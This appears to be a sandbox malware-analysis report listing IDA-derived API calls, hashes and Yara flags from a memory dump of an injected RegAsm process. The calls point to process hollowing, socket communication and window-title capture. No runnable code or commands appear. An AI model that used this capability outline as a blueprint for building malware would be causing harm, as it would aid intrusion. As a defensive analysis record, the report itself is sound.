                                                                                                                                                                      • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 00446227
                                                                                                                                                                        • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                      • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap$_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1482568997-0
                                                                                                                                                                      • Opcode ID: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                                                                                                                                                                      • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                                                                                                                                      • Opcode Fuzzy Hash: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                                                                                                                                                                      • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                                                                                                                                      APIs
                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                                                                                                        • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateEventStartupsocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1953588214-0
                                                                                                                                                                      • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                                                                                      • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                                                                                      • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                                                                                                      APIs
                                                                                                                                                                      • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                                                                      • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3750050125-0
                                                                                                                                                                      • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                      • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                                                                                                      • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                      • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                                                      • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                                                                                                      • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                                                      • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 0041BB49
                                                                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ForegroundText
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 29597999-0
                                                                                                                                                                      • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                                                      • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                                                                                                                      • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                                                      • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                                                                                                                      APIs
                                                                                                                                                                      • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                                                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                                                                                                                                        • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                                                                        • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                                                                        • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                                                                        • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                                                                        • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                                                                        • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                                                                        • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                                                                        • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1170566393-0
                                                                                                                                                                      • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                                                                                                                      • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                                                                                                                                                      • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                                                                                                                      • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                                                                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 806969131-0
                                                                                                                                                                      • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                      • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                                                                                                      • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                      • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                                                                                                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 806969131-0
                                                                                                                                                                      • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                                                                      • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                                                                                                                                      • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                                                                      • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                                                                        • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                                                                        • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                                                                        • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                                                                        • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                                                                        • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                                                                        • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                                                                        • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                                                                        • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                                                                        • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                                                                      • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                                                      • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2948481953-0
                                                                                                                                                                      • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                                                                                                      • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                                                                                                                                                                      • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                                                                                                      • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                                                                                                                                                                      APIs
                                                                                                                                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __crt_fast_encode_pointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3768137683-0
                                                                                                                                                                      • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                      • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                                                                                                      • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                      • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                                                                      • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                                                                                                                                      • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                                                                      • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __alldvrm
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 65215352-0
                                                                                                                                                                      • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                                                                      • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                                                                                                                                      • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                                                                      • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                                                      • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                                                                                                      • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                                                      • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Startup
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 724789610-0
                                                                                                                                                                      • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                                                                                                      • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                                                                                                                      • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                                                                                                      • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Deallocatestd::_
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1323251999-0
                                                                                                                                                                      • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                                      • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                                                                                                      • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                                      • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: recv
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1507349165-0
                                                                                                                                                                      • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                                                                      • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                                                                                                                      • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                                                                      • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: send
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2809346765-0
                                                                                                                                                                      • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                                                                      • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                                                                                                                      • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                                                                      • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                                                                      • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                                                                                                                      • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                                                                      • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                                                                                                        • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                                                                                        • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                                                                                        • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                                                                                                        • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
